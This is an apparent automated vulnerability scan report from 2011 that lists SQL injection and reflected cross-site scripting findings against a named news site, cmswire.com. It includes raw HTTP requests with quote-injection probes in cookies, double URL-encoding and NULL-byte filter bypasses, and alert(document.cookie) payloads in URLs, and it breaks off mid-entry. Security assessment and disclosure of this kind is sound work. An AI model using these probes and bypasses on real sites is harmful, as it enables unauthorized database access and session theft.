XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, cmswire.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 17 08:26:18 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://www.cmswire.com/cms/products/ [FirstVisit cookie]

1.2. http://www.cmswire.com/cms/products/ [LastVisit cookie]

1.3. http://www.cmswire.com/cms/products/ [__utmb cookie]

1.4. http://www.cmswire.com/cms/products/ [_chartbeat2 cookie]

1.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [LastVisit cookie]

1.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [PHPSESSID cookie]

1.7. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [__utmc cookie]

2. Cross-site scripting (reflected)

2.1. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php [name of an arbitrarily supplied request parameter]

2.2. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [REST URL parameter 4]

2.3. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [REST URL parameter 4]

2.4. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [name of an arbitrarily supplied request parameter]

2.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364 [name of an arbitrarily supplied request parameter]

2.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364 [name of an arbitrarily supplied request parameter]

2.7. http://www.cmswire.com/taf.php [Referer HTTP header]

2.8. http://www.cmswire.com/taf.php [Referer HTTP header]

3. Cookie without HttpOnly flag set

3.1. http://www.cmswire.com/

3.2. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php

4. Cross-domain script include

4.1. http://www.cmswire.com/

4.2. http://www.cmswire.com/click/

4.3. http://www.cmswire.com/cms/products/

4.4. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php

4.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

4.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364

4.7. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364

4.8. http://www.cmswire.com/taf.php

4.9. http://www.cmswire.com/utils/user/signup.php

5. HTML does not specify charset

5.1. http://www.cmswire.com/click/

5.2. http://www.cmswire.com/taf.php

5.3. http://www.cmswire.com/utils/user/signup.php

6. Content type incorrectly stated



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.cmswire.com/cms/products/ [FirstVisit cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/products/

Issue detail

The FirstVisit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the FirstVisit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT'; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:46:22 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT''; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:46:23 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.2. http://www.cmswire.com/cms/products/ [LastVisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/products/

Issue detail

The LastVisit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the LastVisit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the LastVisit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT%2527; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:46:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT%2527%2527; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:46:29 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.3. http://www.cmswire.com/cms/products/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/products/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192'

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:46:47 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192''

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:46:47 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.4. http://www.cmswire.com/cms/products/ [_chartbeat2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/products/

Issue detail

The _chartbeat2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _chartbeat2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu%00'; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:46:35 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu%00''; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:46:35 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [LastVisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The LastVisit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the LastVisit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the LastVisit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT%2527; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:51:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT%2527%2527; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:51:58 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0'

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:52:31 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

